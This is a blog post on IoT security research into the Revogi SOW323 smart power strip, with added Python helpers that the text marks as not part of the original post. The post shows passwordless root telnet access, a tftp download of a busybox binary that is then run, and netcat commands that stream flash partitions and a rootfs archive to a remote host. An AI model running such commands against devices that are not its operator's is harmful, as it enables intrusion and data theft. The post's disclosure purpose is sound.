Friday, April 27, 2018

Revogi Smart Power Strip SOW323 IoT Security apocalypse

I started looking for a replacement for my trusty Gembird Silvershield USB-controlled 4-socket power plug. After some searching I discovered the Revogi Smart Power Strip SOW323. The device looks awesome: 6 controlled sockets, an ethernet plug, power consumption monitoring, ~100EUR, just what I need! So I bought one and started looking around...

The system security is state of the art, as one would expect from an IoT device.
# telnet 10.77.1.2
Trying 10.77.1.2...
Connected to 10.77.1.2.
Escape character is '^]'.
rlx-linux login: root
RLX Linux version 2.0
         _           _  _
        | |         | ||_|                
   _  _ | | _  _    | | _ ____  _   _  _  _
  | |/ || |\ \/ /   | || |  _ \| | | |\ \/ /
  | |_/ | |/    \   | || | | | | |_| |/    \
  |_|   |_|\_/\_/   |_||_|_| |_|\____|\_/\_/

For further information check:
http://processor.realtek.com/
#
The login is "root", and the system doesn't even ask for a password.
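To turn that finding into something a defender can check across captured sessions, here is an added example in Python (not from the post): it scans a terminal transcript for a login: prompt that reaches a shell prompt with no Password: prompt in between. Both transcripts are constructed for the example, the first from the session above and the second from a hypothetical device of the same kind that does ask for a password.

```python
import re

# Constructed sample: the session above as a terminal logger would capture it
# (text assembled for this example, not a log file from the device).
SESSION_NO_PASSWORD = """\
Trying 10.77.1.2...
Connected to 10.77.1.2.
Escape character is '^]'.
rlx-linux login: root
RLX Linux version 2.0
For further information check:
http://processor.realtek.com/
#
"""

# Constructed counter-example: a hypothetical device that does prompt for a password.
SESSION_WITH_PASSWORD = """\
Trying 10.77.1.3...
Connected to 10.77.1.3.
Escape character is '^]'.
rlx-linux login: root
Password:
#
"""

CONNECTED_RE = re.compile(r"^Connected to (\S+?)\.?$")
LOGIN_RE = re.compile(r"login:\s*(\S+)\s*$")
PASSWORD_RE = re.compile(r"password\s*:", re.IGNORECASE)
PROMPT_RE = re.compile(r"^\s*[#$]\s*$")   # a bare shell prompt on a line of its own


def find_passwordless_logins(transcript):
    """Return one finding per login that reached a shell prompt with no
    Password: prompt in between.  Each finding is a dict with the host
    (from the 'Connected to' line), the user name and the transcript line
    number of the login: line."""
    findings = []
    host = None
    pending = None          # (line number, user name) of the last login: line
    saw_password = False
    for lineno, line in enumerate(transcript.splitlines(), 1):
        m = CONNECTED_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = LOGIN_RE.search(line)
        if m:
            pending = (lineno, m.group(1))
            saw_password = False
            continue
        if pending is None:
            continue
        if PASSWORD_RE.search(line):
            saw_password = True
        elif PROMPT_RE.match(line):
            if not saw_password:
                findings.append({"host": host, "user": pending[1], "line": pending[0]})
            pending = None  # outcome of this login is known either way
    return findings


if __name__ == "__main__":
    for name, text in (("no password", SESSION_NO_PASSWORD),
                       ("with password", SESSION_WITH_PASSWORD)):
        print(name, "->", find_passwordless_logins(text))
```

Feeding it the transcripts of an inventory run over your own devices gives a list of hosts and accounts that never saw a password prompt; a login that fails ("Login incorrect") never reaches a prompt and so never counts.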

Sadly, the system is really cut down, most likely for security reasons, so it doesn't offer many useful commands:
#
arp        chmod      egrep      insmod     killall    modprobe   reboot     tar        vi
arping     cp         free       ip         ledbtn     mount      rm         telnetd
ash        cut        grep       iwconfig   ln         mv         rmmod      tftp
brctl      date       halt       iwcontrol  login      netstat    route      touch
busybox    depmod     hostname   iwlist     ls         ping       routed     udhcpc
cat        df         ifconfig   iwpriv     lsmod      poweroff   sh         udhcpd
cfg        echo       init       kill       mkdir      ps         switch     umount
But that's fine, there's the "tftp" command, so let's see:
# tftp -g -r /srv/tftp/test -l /tmp/test 10.0.0.1
# ls /tmp/test
/tmp/test
The syntax is a bit odd: "-g" means get, "-r" names the remote file and "-l" the local one. The busybox version is 1.13.6 or so and oddly cut down. But this looks good: we can download files onto the Smart Power Strip.

Let's compile busybox with some more useful tools to dump the content of the flash, so we can politely ask the vendor for the GPLed sources with a binary in hand.

The system runs on an RTL819x MIPS SoC with uClibc 0.9.30 and Linux 2.6.30.9:

# cat /proc/cpuinfo
system type             : RTL819x
processor               : 0
cpu model               : 52481
BogoMIPS                : 379.28
hardware watchpoint     : no
tlb_entries             : 32
mips16 implemented      : yes
# ls /lib/
ld-uClibc-0.9.30.3.so   libcrypt.so.0           libm.so.0
ld-uClibc.so            libgcc.so               libpthread-0.9.30.3.so
ld-uClibc.so.0          libgcc_s.so             libpthread.so.0
ld.so.1                 libgcc_s.so.1           libuClibc-0.9.30.3.so
libc.so.0               libiw.so.29             modules
libcrypt-0.9.30.3.so    libm-0.9.30.3.so
libcrypt.so             libm.so
# ls /lib/modules/2.6.30.9/
build                modules.dep.bin      modules.pcimap
kernel               modules.ieee1394map  modules.seriomap
modules.alias        modules.inputmap     modules.symbols
modules.alias.bin    modules.isapnpmap    modules.symbols.bin
modules.ccwmap       modules.ofmap        modules.usbmap
modules.dep          modules.order        source
No modern MIPS toolchain will produce binaries that run on that antique, but luckily there is an RLX-linux SDK dump on GitHub (link).

Then it's only a matter of doing a static build of busybox using the oldest SDK in the repo:
export PATH=/path/to/rtl819x-toolchain/toolchain/rsdk-1.3.6-4181-EB-2.6.30-0.9.30/bin/:$PATH
export CROSS_COMPILE=mips-linux-
make menuconfig    # enable the static build option (CONFIG_STATIC) under Build Options
make
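Before pushing the result over, it is worth confirming that the file is what this target needs: an ELF32, big-endian (the EB in the SDK directory name), EM_MIPS executable with no PT_INTERP, i.e. really static. The following Python is an added example, not from the post or the SDK; the script name elfcheck.py is an assumption, and build_sample_elf() constructs a header-only ELF image purely so the parser can be exercised without a real binary.

```python
import struct
import sys

ELFCLASS32 = 1
ELFDATA2LSB = 1
ELFDATA2MSB = 2
ET_EXEC = 2
EM_MIPS = 8
PT_LOAD = 1
PT_INTERP = 3
EHDR_SIZE = 52          # ELF32 header size
PHDR_SIZE = 32          # ELF32 program header size


def inspect_elf32(data):
    """Parse the ELF32 header and program headers of `data` and return the
    facts the target cares about: endianness, type, machine, static or not."""
    if len(data) < EHDR_SIZE or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if data[4] != ELFCLASS32:
        raise ValueError("not ELF32 (a 64-bit image is wrong for this SoC anyway)")
    endian = ">" if data[5] == ELFDATA2MSB else "<"
    (e_type, e_machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from(endian + "HHIIIIIHHH", data, 16)
    has_interp = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 4 > len(data):
            raise ValueError("program header table truncated")
        (p_type,) = struct.unpack_from(endian + "I", data, off)
        if p_type == PT_INTERP:       # asks for a dynamic loader -> not static
            has_interp = True
    return {"big_endian": endian == ">", "type": e_type,
            "machine": e_machine, "static": not has_interp}


def fits_rtl819x(data):
    """Return (ok, reasons); ok is True only for a static, big-endian,
    MIPS ELF32 executable."""
    info = inspect_elf32(data)
    reasons = []
    if info["machine"] != EM_MIPS:
        reasons.append("machine is %d, expected EM_MIPS (8)" % info["machine"])
    if not info["big_endian"]:
        reasons.append("little-endian image; the rsdk-*-EB-* toolchain targets big-endian")
    if not info["static"]:
        reasons.append("PT_INTERP present: dynamically linked, will not run against the strip's uClibc")
    if info["type"] != ET_EXEC:
        reasons.append("e_type is %d, expected ET_EXEC (2)" % info["type"])
    return (not reasons), reasons


def build_sample_elf(big_endian=True, machine=EM_MIPS, with_interp=False):
    """Construct a header-only ELF32 image (constructed sample, no code in it)
    so the checks above can be exercised without a real cross-compiled binary."""
    endian = ">" if big_endian else "<"
    phdrs = [(PT_LOAD, 0, 0x400000, 0x400000, 0, 0, 5, 0x1000)]
    if with_interp:
        phdrs.insert(0, (PT_INTERP, 0, 0, 0, 0, 0, 4, 1))
    ident = (b"\x7fELF" + bytes([ELFCLASS32, ELFDATA2MSB if big_endian else ELFDATA2LSB, 1, 0])
             + b"\x00" * 8)
    header = ident + struct.pack(endian + "HHIIIIIHHHHHH", ET_EXEC, machine, 1, 0x400100,
                                 EHDR_SIZE, 0, 0, EHDR_SIZE, PHDR_SIZE, len(phdrs), 40, 0, 0)
    return header + b"".join(struct.pack(endian + "IIIIIIII", *p) for p in phdrs)


if __name__ == "__main__":
    # usage: python3 elfcheck.py busybox   (script name assumed)
    with open(sys.argv[1], "rb") as f:
        ok, reasons = fits_rtl819x(f.read())
    print("OK" if ok else "NOT SUITABLE: " + "; ".join(reasons))
```

A binary that fails the endianness or PT_INTERP check will not even start on the strip, and since the cut-down shell gives little diagnostic output, catching that on the build host saves a round of tftp transfers.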
And finally, transfer the static busybox binary to the system:
# tftp -g -r /srv/tftp/busybox -l /tmp/busybox 10.0.0.1
# chmod a+x /tmp/busybox

# /tmp/busybox
BusyBox v1.21.0 (2018-04-27 18:51:36 CEST) multi-call binary.

...
Good, the replacement busybox, with functionality like "netcat", is working. Finally, we can do something like this to pipe the content of the flash over the network to a remote system:
# cat /dev/mtdblock0 | /tmp/busybox nc 10.0.0.1 6666
# cat /dev/mtdblock1 | /tmp/busybox nc 10.0.0.1 6666
Or back up the rootfs binaries for later analysis:
# tar -cf /tmp/root.tar /bin /etc /home /init /lib /mnt /usr /var
tar: removing leading '/' from member names
tar: /var/tmp/root.tar: file is the archive; skipping
# cat /tmp/root.tar | /tmp/busybox nc 10.0.0.1 6666
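The receiving side of that transfer, as an added example in Python (not from the post): in place of a plain listener on the remote host it accepts one connection, stores the stream, and compares byte count and MD5 against values read off the device beforehand. Those expected values are assumptions (for example the partition size from /proc/mtd and `md5sum /dev/mtdblock0` using the replacement busybox; the post shows neither), the script name recv_dump.py is assumed, and roundtrip_selfcheck() runs the same code over a constructed in-memory sample so it can be tried without a device.

```python
import hashlib
import io
import os
import socket
import sys
import tempfile

CHUNK = 64 * 1024


def receive_stream(reader, out_path):
    """Copy everything readable from `reader` (any object with .read())
    to `out_path`, hashing on the way.  Returns (byte_count, md5_hex)."""
    digest = hashlib.md5()
    size = 0
    with open(out_path, "wb") as out:
        while True:
            chunk = reader.read(CHUNK)
            if not chunk:
                break
            out.write(chunk)
            digest.update(chunk)
            size += len(chunk)
    return size, digest.hexdigest()


def check_dump(size, md5_hex, expected_size=None, expected_md5=None):
    """Return a list of problems; empty means the dump looks complete.
    expected_size / expected_md5 are what the device itself reports
    (assumed sources: /proc/mtd and busybox md5sum on the mtdblock)."""
    problems = []
    if size == 0:
        problems.append("received 0 bytes: the sender closed before writing anything")
    if expected_size is not None and size != expected_size:
        problems.append("size mismatch: got %d bytes, device reports %d" % (size, expected_size))
    if expected_md5 is not None and md5_hex != expected_md5.strip().lower():
        problems.append("md5 mismatch: got %s, device reports %s" % (md5_hex, expected_md5))
    return problems


def serve_once(port, out_path, expected_size=None, expected_md5=None):
    """Accept a single TCP connection, store its stream, and verify it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, _peer = srv.accept()
        with conn, conn.makefile("rb") as reader:
            size, md5_hex = receive_stream(reader, out_path)
    return size, md5_hex, check_dump(size, md5_hex, expected_size, expected_md5)


def roundtrip_selfcheck():
    """Exercise receive_stream/check_dump on a constructed 4 KiB sample
    (not real flash content).  Returns (size, md5_hex, problems, stored_ok)."""
    sample = b"\xff" * 2048 + bytes(range(256)) * 8      # constructed sample image
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "mtdblock0.bin")
        size, md5_hex = receive_stream(io.BytesIO(sample), path)
        with open(path, "rb") as f:
            stored_ok = f.read() == sample
    problems = check_dump(size, md5_hex, len(sample), hashlib.md5(sample).hexdigest())
    return size, md5_hex, problems, stored_ok


if __name__ == "__main__":
    # usage: python3 recv_dump.py PORT OUTFILE [EXPECTED_SIZE] [EXPECTED_MD5]
    port, out_path = int(sys.argv[1]), sys.argv[2]
    exp_size = int(sys.argv[3]) if len(sys.argv) > 3 else None
    exp_md5 = sys.argv[4] if len(sys.argv) > 4 else None
    size, md5_hex, problems = serve_once(port, out_path, exp_size, exp_md5)
    print("received %d bytes, md5 %s" % (size, md5_hex))
    print("OK" if not problems else "PROBLEMS: " + "; ".join(problems))
```

Start it on the host before running the cat | nc line on the strip; a short or mismatched dump is the usual symptom of the sender being killed mid-read or of a partition larger than the mtdblock read returned, and the size and hash comparison catches both before any time is spent unpacking the image.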

I can only finish this article with the famous quote: the S in IoT stands for Security.
